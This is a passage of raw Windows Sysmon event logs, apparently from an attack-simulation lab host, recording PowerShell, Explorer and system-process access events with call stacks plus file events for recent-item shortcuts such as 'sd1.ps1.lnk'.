indows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054973Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:08:31.909{466BC892-F87F-60EB-FE7D-00000000CF01}960810032C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+154947|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054972Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:08:31.909{466BC892-F87F-60EB-FE7D-00000000CF01}960810032C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6497|C:\Windows\System32\shcore.dll+6387|C:\Windows\System32\shcore.dll+62fd|C:\Windows\System32\shcore.dll+620a|C:\Windows\System32\windows.storage.dll+609de|C:\Windows\System32\windows.storage.dll+15427c|C:\Windows\System32\windows.storage.dll+154058|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054971Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:08:31.909{466BC892-F87F-60EB-FE7D-00000000CF01}960810032C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+609cc|C:\Windows\System32\windows.storage.dll+15427c|C:\Windows\System32\windows.storage.dll+154058|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054970Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:08:31.909{466BC892-F87F-60EB-FE7D-00000000CF01}960810032C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+609cc|C:\Windows\System32\windows.storage.dll+15427c|C:\Windows\System32\windows.storage.dll+154058|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001054969Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:31.909{466BC892-F87F-60EB-FE7D-00000000CF01}9608ATTACKRANGE\bobC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\bob\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RFf783124.TMPMD5=2C0FD6F951FA1D507F7B5C46BB749BFE,SHA256=500857DA7D87C376CB267338351A1D967C9EA82A3709662A2377A28AD4E79CBF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001054968Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:08:31.880{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-F87F-60EB-FE7D-00000000CF01}9608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054967Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:31.791{466BC892-02B0-60E8-1600-00000000CF01}13044400C:\Windows\System32\svchost.exe{466BC892-F87F-60EB-FE7D-00000000CF01}9608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054966Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:08:31.791{466BC892-02B0-60E8-1600-00000000CF01}13041340C:\Windows\System32\svchost.exe{466BC892-F87F-60EB-FE7D-00000000CF01}9608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054965Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:31.760{466BC892-32D3-60E8-770B-00000000CF01}63569744C:\Windows\Explorer.EXE{466BC892-F87F-60EB-FE7D-00000000CF01}9608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+62945|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054964Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:08:31.760{466BC892-32D3-60E8-770B-00000000CF01}63569744C:\Windows\Explorer.EXE{466BC892-F87F-60EB-FE7D-00000000CF01}9608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6285e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054963Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:31.760{466BC892-32D3-60E8-770B-00000000CF01}63569744C:\Windows\Explorer.EXE{466BC892-F87F-60EB-FE7D-00000000CF01}9608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054962Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:08:31.722{466BC892-32D3-60E8-730B-00000000CF01}59843788C:\Windows\System32\taskhostw.exe{466BC892-F87F-60EB-FF7D-00000000CF01}6156C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054961Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:31.707{466BC892-32D3-60E8-730B-00000000CF01}59843788C:\Windows\System32\taskhostw.exe{466BC892-F87F-60EB-FF7D-00000000CF01}6156C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054960Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:31.675{466BC892-32D3-60E8-770B-00000000CF01}63569004C:\Windows\Explorer.EXE{466BC892-F87F-60EB-FE7D-00000000CF01}9608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+62945|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054959Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:08:31.675{466BC892-32D3-60E8-770B-00000000CF01}63569004C:\Windows\Explorer.EXE{466BC892-F87F-60EB-FE7D-00000000CF01}9608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6285e|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054958Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:31.675{466BC892-32D3-60E8-770B-00000000CF01}63569004C:\Windows\Explorer.EXE{466BC892-F87F-60EB-FE7D-00000000CF01}9608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054957Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:08:31.675{466BC892-32D3-60E8-770B-00000000CF01}63569004C:\Windows\Explorer.EXE{466BC892-F87F-60EB-FE7D-00000000CF01}9608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054956Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:31.660{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-F87F-60EB-FF7D-00000000CF01}6156C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+622c0|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054955Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:31.660{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-F87F-60EB-FF7D-00000000CF01}6156C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47c90|C:\Windows\System32\SHELL32.dll+6227c|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x80000000000000001054954Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:31.660{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-F87F-60EB-FF7D-00000000CF01}6156C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62250|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054953Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:31.660{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-F87F-60EB-FF7D-00000000CF01}6156C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d2c9|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x80000000000000001054952Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:31.592{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXEC:\Users\bob\AppData\Roaming\Microsoft\Windows\Recent\test.lnk2021-07-12 07:44:24.124 23542300x80000000000000001054951Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:31.592{466BC892-32D3-60E8-770B-00000000CF01}6356ATTACKRANGE\bobC:\Windows\Explorer.EXEC:\Users\bob\AppData\Roaming\Microsoft\Windows\Recent\test.lnkMD5=1BAD03CA3931966D8844C2E4D7C2B462,SHA256=2877D60F7760632BB56A991256120A7A99021E6F2BC7844553E8DAC6ABE30C3B,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001054950Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:08:31.544{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXEC:\Users\bob\AppData\Roaming\Microsoft\Windows\Recent\sd1.ps1.lnk2021-07-12 07:47:36.117 23542300x80000000000000001054949Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:31.538{466BC892-32D3-60E8-770B-00000000CF01}6356ATTACKRANGE\bobC:\Windows\Explorer.EXEC:\Users\bob\AppData\Roaming\Microsoft\Windows\Recent\sd1.ps1.lnkMD5=E5C8C125522D6DE0DC7A112B59DD6F48,SHA256=5022BCD7A4BE370B6A8034BCF7878CADBA4160196E3DFF8B37053F95370E897A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001054948Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:31.537{466BC892-02B0-60E8-1600-00000000CF01}13044400C:\Windows\System32\svchost.exe{466BC892-F87F-60EB-FF7D-00000000CF01}6156C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054947Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:31.522{466BC892-02B0-60E8-1600-00000000CF01}13041340C:\Windows\System32\svchost.exe{466BC892-F87F-60EB-FF7D-00000000CF01}6156C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054946Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:08:31.490{466BC892-F87F-60EB-FF7D-00000000CF01}6156580C:\Windows\system32\conhost.exe{466BC892-F87F-60EB-FE7D-00000000CF01}9608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054945Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:31.459{466BC892-32CD-60E8-670B-00000000CF01}45164260C:\Windows\system32\csrss.exe{466BC892-F87F-60EB-FF7D-00000000CF01}6156C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001054944Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:31.443{466BC892-32CD-60E8-670B-00000000CF01}45163808C:\Windows\system32\csrss.exe{466BC892-F87F-60EB-FE7D-00000000CF01}9608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001054943Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:08:31.443{466BC892-32D3-60E8-770B-00000000CF01}63567592C:\Windows\Explorer.EXE{466BC892-F87F-60EB-FE7D-00000000CF01}9608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+9070f|C:\Windows\System32\windows.storage.dll+90385|C:\Windows\System32\windows.storage.dll+8fe76|C:\Windows\System32\windows.storage.dll+912e8|C:\Windows\System32\windows.storage.dll+8fc9e|C:\Windows\System32\windows.storage.dll+92ab5|C:\Windows\System32\windows.storage.dll+92e34|C:\Windows\System32\windows.storage.dll+92470|C:\Windows\System32\windows.storage.dll+94c4a|C:\Windows\System32\windows.storage.dll+94a02|C:\Windows\System32\SHELL32.dll+3f98d|C:\Windows\System32\SHELL32.dll+3e526|C:\Windows\System32\SHELL32.dll+802b1|C:\Windows\System32\SHELL32.dll+6724e|C:\Windows\System32\SHELL32.dll+16d60c|C:\Windows\System32\SHELL32.dll+19e7e8|C:\Windows\System32\SHELL32.dll+2844a3|C:\Windows\system32\explorerframe.dll+13cf7b|C:\Windows\system32\explorerframe.dll+139d07|C:\Windows\System32\SHELL32.dll+16d8b0 10341000x80000000000000001054942Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:08:31.443{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054941Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:31.443{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054940Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:08:31.443{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 